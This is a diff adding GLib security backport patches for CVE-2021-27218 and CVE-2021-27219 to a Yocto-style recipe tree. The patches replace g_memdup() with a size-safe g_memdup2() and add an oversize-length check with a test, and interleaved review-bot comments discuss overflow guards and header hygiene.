35 * Create byte array containing the data. The data will be owned by the array
36 * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
37 *
38+ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
39+ * stores the length of its data in #guint, which may be shorter than
40+ * #gsize.
41+ *
42 * Since: 2.32
43 *
44 * Returns: (transfer full): a new #GByteArray
45@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
46 GByteArray *array;
47 GRealArray *real;
48
49+ g_return_val_if_fail (len <= G_MAXUINT, NULL);
50+
51 array = g_byte_array_new ();
52 real = (GRealArray *)array;
53 g_assert (real->data == NULL);
54--- a/glib/gbytes.c
55+++ b/glib/gbytes.c
56@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
57 * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
58 * other cases the data is copied.
59 *
60+ * Do not use it if @bytes contains more than %G_MAXUINT
61+ * bytes. #GByteArray stores the length of its data in #guint, which
62+ * may be shorter than #gsize, that @bytes is using.
63+ *
64 * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
65 *
66 * Since: 2.32
67--- a/glib/tests/bytes.c
68+++ b/glib/tests/bytes.c
69@@ -10,12 +10,12 @@
70 */
71
72 #undef G_DISABLE_ASSERT
73-#undef G_LOG_DOMAIN
74
75 #include <stdio.h>
76 #include <stdlib.h>
77 #include <string.h>
78 #include "glib.h"
79+#include "glib/gstrfuncsprivate.h"
80
81 /* Keep in sync with glib/gbytes.c */
82 struct _GBytes
83@@ -334,6 +334,38 @@ test_to_array_transferred (void)
84 }
85
86 static void
87+test_to_array_transferred_oversize (void)
88+{
89+ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
90+ "G_MAXUINT in length; test that longer ones are rejected");
91+
92+ if (sizeof (guint) >= sizeof (gsize))
93+ {
94+ g_test_skip ("Skipping test as guint is not smaller than gsize");
95+ }
96+ else if (g_test_undefined ())
97+ {
98+ GByteArray *array = NULL;
99+ GBytes *bytes = NULL;
100+ gpointer data = g_memdup2 (NYAN, N_NYAN);
101+ gsize len = ((gsize) G_MAXUINT) + 1;
102+
103+ bytes = g_bytes_new_take (data, len);
104+ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
105+ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
106+ array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
107+ g_test_assert_expected_messages ();
108+ g_assert_null (array);
109+
110+ g_free (data);
111+ }
112+ else
113+ {
114+ g_test_skip ("Skipping test as testing undefined behaviour is disabled");
115+ }
116+}
117+
118+static void
119 test_to_array_two_refs (void)
120 {
121 gconstpointer memory;
122@@ -410,6 +442,7 @@ main (int argc, char *argv[])
123 g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
124 g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
125 g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
126+ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
127 g_test_add_func ("/bytes/null", test_null);
128
129 return g_test_run ();
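Review bot: The length check added to g_byte_array_new_take is `g_return_val_if_fail (len <= G_MAXUINT, NULL);`, a precondition macro that GLib compiles out when built with G_DISABLE_CHECKS, so in such a build the silent truncation this patch targets would remain. If the recipe can be configured that way, an unconditional check is needed; otherwise a comment such as `/* relies on g_return_val_if_fail; not effective with G_DISABLE_CHECKS */` makes the dependency visible. On the failure path the function returns NULL without freeing `data`, which the new test accounts for by calling `g_free (data)` itself, so callers need to know ownership stays with them in that case. The function body continues outside the hunk.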
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
1Backport of:
2
3From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Thu, 4 Feb 2021 13:30:52 +0000
6Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
7MIME-Version: 1.0
8Content-Type: text/plain; charset=UTF-8
9Content-Transfer-Encoding: 8bit
10
11This will replace the existing `g_memdup()` function for use within
12GLib. It has an unavoidable security flaw of taking its `byte_size`
13argument as a `guint` rather than as a `gsize`. Most callers will
14expect it to be a `gsize`, and may pass in large values which could
15silently be truncated, resulting in an undersize allocation compared
16to what the caller expects.
17
18This could lead to a classic buffer overflow vulnerability for many
19callers of `g_memdup()`.
20
21`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
22
23Spotted by Kevin Backhouse of GHSL.
24
25In GLib 2.68, `g_memdup2()` will be a new public API. In this version
26for backport to older stable releases, it’s a new `static inline` API
27in a private header, so that use of `g_memdup()` within GLib can be
28fixed without adding a new API in a stable release series.
29
30Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
31Helps: GHSL-2021-045
32Helps: #2319
33
34Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
35CVE: CVE-2021-27219
36Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
37Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
38
39---
40 docs/reference/glib/meson.build | 1 +
41 glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++
42 glib/meson.build | 1 +
43 glib/tests/strfuncs.c | 23 ++++++++++++++
44 4 files changed, 80 insertions(+)
45 create mode 100644 glib/gstrfuncsprivate.h
46
47--- a/docs/reference/glib/meson.build
48+++ b/docs/reference/glib/meson.build
49@@ -22,6 +22,7 @@ if get_option('gtk_doc')
50 'gprintfint.h',
51 'gmirroringtable.h',
52 'gscripttable.h',
53+ 'gstrfuncsprivate.h',
54 'glib-mirroring-tab',
55 'gnulib',
56 'pcre',
57--- /dev/null
58+++ b/glib/gstrfuncsprivate.h
59@@ -0,0 +1,55 @@
60+/* GLIB - Library of useful routines for C programming
61+ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
62+ *
63+ * This library is free software; you can redistribute it and/or
64+ * modify it under the terms of the GNU Lesser General Public
65+ * License as published by the Free Software Foundation; either
66+ * version 2.1 of the License, or (at your option) any later version.
67+ *
68+ * This library is distributed in the hope that it will be useful,
69+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
70+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
71+ * Lesser General Public License for more details.
72+ *
73+ * You should have received a copy of the GNU Lesser General Public
74+ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
75+ */
76+
77+#include <glib.h>
78+#include <string.h>
79+
80+/*
81+ * g_memdup2:
82+ * @mem: (nullable): the memory to copy.
83+ * @byte_size: the number of bytes to copy.
84+ *
85+ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
86+ * from @mem. If @mem is %NULL it returns %NULL.
87+ *
88+ * This replaces g_memdup(), which was prone to integer overflows when
89+ * converting the argument from a #gsize to a #guint.
90+ *
91+ * This static inline version is a backport of the new public API from
92+ * GLib 2.68, kept internal to GLib for backport to older stable releases.
93+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
94+ *
95+ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
96+ * or %NULL if @mem is %NULL.
97+ * Since: 2.68
98+ */
99+static inline gpointer
100+g_memdup2 (gconstpointer mem,
101+ gsize byte_size)
102+{
103+ gpointer new_mem;
104+
105+ if (mem && byte_size != 0)
106+ {
107+ new_mem = g_malloc (byte_size);
108+ memcpy (new_mem, mem, byte_size);
109+ }
110+ else
111+ new_mem = NULL;
112+
113+ return new_mem;
114+}
115--- a/glib/meson.build
116+++ b/glib/meson.build
117@@ -268,6 +268,7 @@ glib_sources = files(
118 'gslist.c',
119 'gstdio.c',
120 'gstrfuncs.c',
121+ 'gstrfuncsprivate.h',
122 'gstring.c',
123 'gstringchunk.c',
124 'gtestutils.c',
125--- a/glib/tests/strfuncs.c
126+++ b/glib/tests/strfuncs.c
127@@ -32,6 +32,8 @@
128 #include <string.h>
129 #include "glib.h"
130
131+#include "gstrfuncsprivate.h"
132+
133 #if defined (_MSC_VER) && (_MSC_VER <= 1800)
134 #define isnan(x) _isnan(x)
135
136@@ -219,6 +221,26 @@ test_memdup (void)
137 g_free (str_dup);
138 }
139
140+/* Testing g_memdup2() function with various positive and negative cases */
141+static void
142+test_memdup2 (void)
143+{
144+ gchar *str_dup = NULL;
145+ const gchar *str = "The quick brown fox jumps over the lazy dog";
146+
147+ /* Testing negative cases */
148+ g_assert_null (g_memdup2 (NULL, 1024));
149+ g_assert_null (g_memdup2 (str, 0));
150+ g_assert_null (g_memdup2 (NULL, 0));
151+
152+ /* Testing normal usage cases */
153+ str_dup = g_memdup2 (str, strlen (str) + 1);
154+ g_assert_nonnull (str_dup);
155+ g_assert_cmpstr (str, ==, str_dup);
156+
157+ g_free (str_dup);
158+}
159+
160 /* Testing g_strpcpy() function with various positive and negative cases */
161 static void
162 test_stpcpy (void)
163@@ -2523,6 +2545,7 @@ main (int argc,
164 g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
165 g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
166 g_test_add_func ("/strfuncs/memdup", test_memdup);
167+ g_test_add_func ("/strfuncs/memdup2", test_memdup2);
168 g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
169 g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
170 g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
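Review bot: The new private header `glib/gstrfuncsprivate.h` defines `g_memdup2` as a `static inline` function but has no include guard, so a translation unit that pulls it in twice (directly and through another header) would fail with a redefinition error. I would wrap the file in `#ifndef __G_STRFUNCS_PRIVATE_H__` / `#define __G_STRFUNCS_PRIVATE_H__` / `#endif`. The include spelling also differs between the backports: tests/strfuncs.c uses `"gstrfuncsprivate.h"` here, while the bytes.c test in CVE-2021-27218.patch uses `"glib/gstrfuncsprivate.h"`, so each depends on the include paths of its own target.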
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
1From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:37:56 +0000
4Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
5 places
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Convert all the call sites which use `g_memdup()`’s length argument
11trivially (for example, by passing a `sizeof()`), so that they use
12`g_memdup2()` instead.
13
14In almost all of these cases the use of `g_memdup()` would not have
15caused problems, but it will soon be deprecated, so best port away from
16it.
17
18Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
19Helps: #2319
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27219
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 gio/gdbusconnection.c | 5 +++--
28 gio/gdbusinterfaceskeleton.c | 3 ++-
29 gio/gfile.c | 7 ++++---
30 gio/gsettingsschema.c | 5 +++--
31 gio/gwin32registrykey.c | 8 +++++---
32 gio/tests/async-close-output-stream.c | 6 ++++--
33 gio/tests/gdbus-export.c | 5 +++--
34 gio/win32/gwinhttpfile.c | 9 +++++----
35 8 files changed, 29 insertions(+), 19 deletions(-)
36
37--- a/gio/gdbusconnection.c
38+++ b/gio/gdbusconnection.c
39@@ -110,6 +110,7 @@
40 #include "gasyncinitable.h"
41 #include "giostream.h"
42 #include "gasyncresult.h"
43+#include "gstrfuncsprivate.h"
44 #include "gtask.h"
45 #include "gmarshal-internal.h"
46
47@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
48 /* Don't waste memory by copying padding - remember to update this
49 * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
50 */
51- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
52+ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
53 }
54
55 static void
56@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
57 /* Don't waste memory by copying padding - remember to update this
58 * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
59 */
60- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
61+ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
62 }
63
64 static void
65--- a/gio/gdbusinterfaceskeleton.c
66+++ b/gio/gdbusinterfaceskeleton.c
67@@ -28,6 +28,7 @@
68 #include "gdbusmethodinvocation.h"
69 #include "gdbusconnection.h"
70 #include "gmarshal-internal.h"
71+#include "gstrfuncsprivate.h"
72 #include "gtask.h"
73 #include "gioerror.h"
74
75@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
76 * properly before building the hooked_vtable, so we create it
77 * once at the last minute.
78 */
79- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
80+ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
81 interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
82 }
83
84--- a/gio/gfile.c
85+++ b/gio/gfile.c
86@@ -60,6 +60,7 @@
87 #include "gasyncresult.h"
88 #include "gioerror.h"
89 #include "glibintl.h"
90+#include "gstrfuncsprivate.h"
91
92
93 /**
94@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
95 g_main_context_invoke_full (g_task_get_context (task),
96 g_task_get_priority (task),
97 measure_disk_usage_invoke_progress,
98- g_memdup (&progress, sizeof progress),
99+ g_memdup2 (&progress, sizeof progress),
100 g_free);
101 }
102
103@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
104 data->progress_callback ? measure_disk_usage_progress : NULL, task,
105 &result.disk_usage, &result.num_dirs, &result.num_files,
106 &error))
107- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
108+ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
109 else
110 g_task_return_error (task, error);
111 }
112@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
113
114 task = g_task_new (file, cancellable, callback, user_data);
115 g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
116- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
117+ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
118 g_task_set_priority (task, io_priority);
119
120 g_task_run_in_thread (task, measure_disk_usage_thread);
121--- a/gio/gsettingsschema.c
122+++ b/gio/gsettingsschema.c
123@@ -20,6 +20,7 @@
124
125 #include "gsettingsschema-internal.h"
126 #include "gsettings.h"
127+#include "gstrfuncsprivate.h"
128
129 #include "gvdb/gvdb-reader.h"
130 #include "strinfo.c"
131@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
132
133 if (g_str_has_suffix (key, "/"))
134 {
135- gint length = strlen (key);
136+ gsize length = strlen (key);
137
138- strv[j] = g_memdup (key, length);
139+ strv[j] = g_memdup2 (key, length);
140 strv[j][length - 1] = '\0';
141 j++;
142 }
143--- a/gio/gwin32registrykey.c
144+++ b/gio/gwin32registrykey.c
145@@ -28,6 +28,8 @@
146 #include <ntstatus.h>
147 #include <winternl.h>
148
149+#include "gstrfuncsprivate.h"
150+
151 #ifndef _WDMDDK_
152 typedef enum _KEY_INFORMATION_CLASS {
153 KeyBasicInformation,
154@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
155 new_iter->value_name_size = iter->value_name_size;
156
157 if (iter->value_data != NULL)
158- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
159+ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
160
161 new_iter->value_data_size = iter->value_data_size;
162
163@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
164 new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
165
166 if (iter->value_data_expanded_u8 != NULL)
167- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
168- iter->value_data_expanded_charsize);
169+ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
170+ iter->value_data_expanded_charsize);
171
172 new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
173
174--- a/gio/tests/async-close-output-stream.c
175+++ b/gio/tests/async-close-output-stream.c
176@@ -24,6 +24,8 @@
177 #include <stdlib.h>
178 #include <string.h>
179
180+#include "gstrfuncsprivate.h"
181+
182 #define DATA_TO_WRITE "Hello world\n"
183
184 typedef struct
185@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
186
187 data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
188
189- g_assert_cmpint (data->expected_size, >, 0);
190+ g_assert_cmpuint (data->expected_size, >, 0);
191
192- data->expected_output = g_memdup (written, (guint)data->expected_size);
193+ data->expected_output = g_memdup2 (written, data->expected_size);
194
195 /* then recreate the streams and prepare them for the asynchronous close */
196 destroy_streams (data);
197--- a/gio/tests/gdbus-export.c
198+++ b/gio/tests/gdbus-export.c
199@@ -23,6 +23,7 @@
200 #include <string.h>
201
202 #include "gdbus-tests.h"
203+#include "gstrfuncsprivate.h"
204
205 /* all tests rely on a shared mainloop */
206 static GMainLoop *loop = NULL;
207@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
208 g_assert_not_reached ();
209 }
210
211- return g_memdup (interfaces, 2 * sizeof (void *));
212+ return g_memdup2 (interfaces, 2 * sizeof (void *));
213 }
214
215 static const GDBusInterfaceVTable *
216@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
217 {
218 const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
219
220- return g_memdup (interfaces, 2 * sizeof (void *));
221+ return g_memdup2 (interfaces, 2 * sizeof (void *));
222 }
223
224 static const GDBusInterfaceVTable *
225--- a/gio/win32/gwinhttpfile.c
226+++ b/gio/win32/gwinhttpfile.c
227@@ -29,6 +29,7 @@
228 #include "gio/gfile.h"
229 #include "gio/gfileattribute.h"
230 #include "gio/gfileinfo.h"
231+#include "gstrfuncsprivate.h"
232 #include "gwinhttpfile.h"
233 #include "gwinhttpfileinputstream.h"
234 #include "gwinhttpfileoutputstream.h"
235@@ -393,10 +394,10 @@
236 child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
237 child->vfs = winhttp_file->vfs;
238 child->url = winhttp_file->url;
239- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
240- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
241- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
242- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
243+ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
244+ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
245+ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
246+ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
247 child->url.lpszUrlPath = wnew_path;
248 child->url.dwUrlPathLength = wcslen (wnew_path);
249 child->url.lpszExtraInfo = NULL;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
1From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:39:25 +0000
4Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
5 obvious places
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Convert all the call sites which use `g_memdup()`’s length argument
11trivially (for example, by passing a `sizeof()`), so that they use
12`g_memdup2()` instead.
13
14In almost all of these cases the use of `g_memdup()` would not have
15caused problems, but it will soon be deprecated, so best port away from
16it.
17
18Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
19Helps: #2319
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27219
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 gobject/gsignal.c | 3 ++-
28 gobject/gtype.c | 9 +++++----
29 gobject/gtypemodule.c | 3 ++-
30 gobject/tests/param.c | 4 +++-
31 4 files changed, 12 insertions(+), 7 deletions(-)
32
33--- a/gobject/gsignal.c
34+++ b/gobject/gsignal.c
35@@ -28,6 +28,7 @@
36 #include <signal.h>
37
38 #include "gsignal.h"
39+#include "gstrfuncsprivate.h"
40 #include "gtype-private.h"
41 #include "gbsearcharray.h"
42 #include "gvaluecollector.h"
43@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal
44 node->single_va_closure_is_valid = FALSE;
45 node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
46 node->n_params = n_params;
47- node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
48+ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
49 node->return_type = return_type;
50 node->class_closure_bsa = NULL;
51 if (accumulator)
52--- a/gobject/gtype.c
53+++ b/gobject/gtype.c
54@@ -33,6 +33,7 @@
55
56 #include "glib-private.h"
57 #include "gconstructor.h"
58+#include "gstrfuncsprivate.h"
59
60 #ifdef G_OS_WIN32
61 #include <windows.h>
62@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
63 iholder->next = iface_node_get_holders_L (iface);
64 iface_node_set_holders_W (iface, iholder);
65 iholder->instance_type = NODE_TYPE (node);
66- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
67+ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
68 iholder->plugin = plugin;
69
70 /* create an iface entry for this type */
71@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
72 INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
73
74 check_interface_info_I (iface, instance_type, &tmp_info);
75- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
76+ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
77 }
78
79 return iholder; /* we don't modify write lock upon returning NULL */
80@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
81 IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
82
83 if (pentry)
84- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
85+ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
86 }
87 if (!vtable)
88- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
89+ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
90 entry->vtable = vtable;
91 vtable->g_type = NODE_TYPE (iface);
92 vtable->g_instance_type = NODE_TYPE (node);
93--- a/gobject/gtypemodule.c
94+++ b/gobject/gtypemodule.c
95@@ -19,6 +19,7 @@
96
97 #include <stdlib.h>
98
99+#include "gstrfuncsprivate.h"
100 #include "gtypeplugin.h"
101 #include "gtypemodule.h"
102
103@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
104 module_type_info->loaded = TRUE;
105 module_type_info->info = *type_info;
106 if (type_info->value_table)
107- module_type_info->info.value_table = g_memdup (type_info->value_table,
108+ module_type_info->info.value_table = g_memdup2 (type_info->value_table,
109 sizeof (GTypeValueTable));
110
111 return module_type_info->type;
112--- a/gobject/tests/param.c
113+++ b/gobject/tests/param.c
114@@ -2,6 +2,8 @@
115 #include <glib-object.h>
116 #include <stdlib.h>
117
118+#include "gstrfuncsprivate.h"
119+
120 static void
121 test_param_value (void)
122 {
123@@ -874,7 +876,7 @@ main (int argc, char *argv[])
124 test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
125 data.change_this_flag, data.change_this_type,
126 data.use_this_flag, data.use_this_type);
127- test_data = g_memdup (&data, sizeof (TestParamImplementData));
128+ test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
129 g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
130 g_free (test_path);
131 }
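Review bot: The length at `node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);` in the g_signal_newv hunk is a product rather than a plain `sizeof`, and g_memdup2() only widens the length parameter; it does not check a multiplication done by the caller. On builds where gsize is 32 bits the product can wrap unless n_params is bounded earlier in g_signal_newv, which starts outside this hunk, so the bound cannot be confirmed here. A one-line comment above the call naming that bound, or failing that a guard such as `g_return_val_if_fail (n_params <= G_MAXSIZE / sizeof (GType), 0);`, would make the assumption auditable. The same caller-side arithmetic appears in CVE-2021-27219-04.patch at `g_memdup2 (elements, n_elements * element_size)` in g_variant_new_fixed_array and at the `sizeof (gpointer) * hash_table->size` copies in g_hash_table_ensure_keyval_fits.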
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
1Backport of:
2
3From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
4From: Philip Withnall <pwithnall@endlessos.org>
5Date: Thu, 4 Feb 2021 13:41:21 +0000
6Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
7 places
8MIME-Version: 1.0
9Content-Type: text/plain; charset=UTF-8
10Content-Transfer-Encoding: 8bit
11
12Convert all the call sites which use `g_memdup()`’s length argument
13trivially (for example, by passing a `sizeof()` or an existing `gsize`
14variable), so that they use `g_memdup2()` instead.
15
16In almost all of these cases the use of `g_memdup()` would not have
17caused problems, but it will soon be deprecated, so best port away from
18it
19
20In particular, this fixes an overflow within `g_bytes_new()`, identified
21as GHSL-2021-045 by GHSL team member Kevin Backhouse.
22
23Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
24Fixes: GHSL-2021-045
25Helps: #2319
26
27Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
28CVE: CVE-2021-27219
29Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
30Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
31
32---
33 glib/gbytes.c | 6 ++++--
34 glib/gdir.c | 3 ++-
35 glib/ghash.c | 7 ++++---
36 glib/giochannel.c | 5 +++--
37 glib/gslice.c | 3 ++-
38 glib/gtestutils.c | 3 ++-
39 glib/gvariant.c | 7 ++++---
40 glib/gvarianttype.c | 3 ++-
41 glib/tests/array-test.c | 4 +++-
42 glib/tests/option-context.c | 6 ++++--
43 glib/tests/uri.c | 8 +++++---
44 11 files changed, 35 insertions(+), 20 deletions(-)
45
46--- a/glib/gbytes.c
47+++ b/glib/gbytes.c
48@@ -34,6 +34,8 @@
49
50 #include <string.h>
51
52+#include "gstrfuncsprivate.h"
53+
54 /**
55 * GBytes:
56 *
57@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
58 {
59 g_return_val_if_fail (data != NULL || size == 0, NULL);
60
61- return g_bytes_new_take (g_memdup (data, size), size);
62+ return g_bytes_new_take (g_memdup2 (data, size), size);
63 }
64
65 /**
66@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
67 * Copy: Non g_malloc (or compatible) allocator, or static memory,
68 * so we have to copy, and then unref.
69 */
70- result = g_memdup (bytes->data, bytes->size);
71+ result = g_memdup2 (bytes->data, bytes->size);
72 *size = bytes->size;
73 g_bytes_unref (bytes);
74 }
75--- a/glib/gdir.c
76+++ b/glib/gdir.c
77@@ -37,6 +37,7 @@
78 #include "gconvert.h"
79 #include "gfileutils.h"
80 #include "gstrfuncs.h"
81+#include "gstrfuncsprivate.h"
82 #include "gtestutils.h"
83 #include "glibintl.h"
84
